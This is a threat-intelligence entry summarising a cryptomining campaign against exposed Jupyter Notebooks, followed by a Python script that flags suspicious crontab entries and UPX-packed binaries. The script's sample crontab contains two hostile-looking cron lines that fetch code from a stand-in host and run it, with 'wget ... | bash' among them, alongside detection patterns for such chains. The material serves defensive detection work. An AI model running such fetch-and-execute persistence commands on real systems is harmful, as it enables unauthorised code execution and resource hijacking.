Cloud Threat Landscape

Exposed Jupyter Notebooks Targeted for Cryptomining

Type: Campaign
Actors: Unknown
Pub. date: March 16, 2025
Initial access: Software misconfig
Impact: Resource hijacking
Observed techniques: UPX packing; Jupyter Notebook misconfig abuse
Observed tools: C3Pool
Targeted technologies: Jupyter Notebook
References: https://www.cadosecurity.com/blog/jupyter-notebooks-cryptominer
Status: Finalized
Last edited: Mar 16, 2025 2:29 PM

Cado Security Labs has uncovered a cryptomining campaign exploiting misconfigured Jupyter Notebooks, affecting both Windows and Linux environments. The attackers use Jupyter as an entry point to deploy a cryptominer through a series of evasive techniques. On Windows, the attack chain begins with retrieving an MSI file that executes a binary named Binary.freedllBinary. This binary loads a secondary payload (java.exe), which masquerades as a Java Platform binary while retrieving and decrypting an additional payload (x2.dat) from repositories like GitHub, Launchpad, and Gitee. The final stage delivers a cryptominer that mines multiple cryptocurrencies, including Monero and Sumokoin. If the MSI execution fails, the attack falls back on a JavaScript backdoor (0217.js), which fetches Linux ELF binaries and installs them using cron jobs.

The Linux variant follows a similar approach but uses bash scripts (0217.js) to deploy 0218.elf and 0218.full. The binaries retrieve encrypted mining payloads (lx.dat), decrypt them using ChaCha20, and execute the miner. The campaign also includes a PHP-based infection mechanism (1.php), which delivers platform-specific cryptomining binaries depending on the operating system. The attackers leverage cloud-based misconfigurations to infiltrate systems, host payloads on repositories like GitHub and Gitee, and set up persistence through cron jobs. Similar tactics have been seen in previous campaigns targeting Ivanti Connect Secure and Korean web servers.
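Two of the observed techniques above, cron-based persistence and UPX packing, lend themselves to cheap host-side triage. The following is an added example written for this entry; it is not code from Cado Security or Wiz, and the crontab lines, the TEST-NET address 203.0.113.10 and the byte strings are constructed stand-ins rather than artifacts from the campaign. It flags crontab entries that both fetch from a remote URL and hand the result to a shell (or make it executable under a scratch path), and it looks for the section names and magic that UPX leaves in a packed binary.

```python
import re
from typing import List

# Constructed sample crontab (not from the report). The two "bad" entries
# mimic the download-then-execute persistence pattern described above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://203.0.113.10/0218.elf -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x
@reboot wget -q -O - http://203.0.113.10/0217.js | bash
30 1 * * 0 /usr/local/bin/backup.sh
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
REMOTE_URL = re.compile(r"https?://")
# Piping into a shell, chmod +x, or staging under a world-writable scratch path.
EXEC_CHAIN = re.compile(r"(\|\s*(ba)?sh\b|chmod\s+\+x|/tmp/|/dev/shm/)")


def suspicious_cron_entries(crontab: str) -> List[dict]:
    """Return crontab entries that both download from a remote URL and
    execute (or stage for execution) what they downloaded.
    Comments and blank lines are skipped; a single indicator alone is not
    reported, which keeps ordinary curl-based health checks out of the output."""
    hits = []
    for lineno, line in enumerate(crontab.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if DOWNLOADER.search(entry) and REMOTE_URL.search(entry):
            reasons.append("remote download")
        if EXEC_CHAIN.search(entry):
            reasons.append("execute/chmod/scratch-path chain")
        if len(reasons) == 2:
            hits.append({"line": lineno, "entry": entry, "reasons": ", ".join(reasons)})
    return hits


# Strings UPX writes into a packed file: its magic and the default section names.
UPX_MARKERS = (b"UPX!", b"UPX0", b"UPX1")


def looks_upx_packed(data: bytes) -> bool:
    """Cheap triage only: UPX normally leaves these markers in the file,
    but a deliberately scrubbed stub will not match, so False is not proof of clean."""
    head = data[:4096]
    return any(marker in head for marker in UPX_MARKERS)


# Constructed byte strings standing in for file headers; not real samples.
FAKE_PACKED = b"\x7fELF" + b"\x00" * 64 + b"UPX!" + b"\x00" * 100
FAKE_PLAIN = b"\x7fELF" + b"\x00" * 200

if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"crontab line {hit['line']}: {hit['reasons']}: {hit['entry']}")
    print("packed:", looks_upx_packed(FAKE_PACKED), "plain:", looks_upx_packed(FAKE_PLAIN))
```

On a real host the same functions can be fed the output of `crontab -l` for each user and the contents of `/etc/cron.d`, and the first few kilobytes of any binary referenced by a flagged entry; a match is a lead for analysis, not a verdict.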


Last Updated: April 3, 2025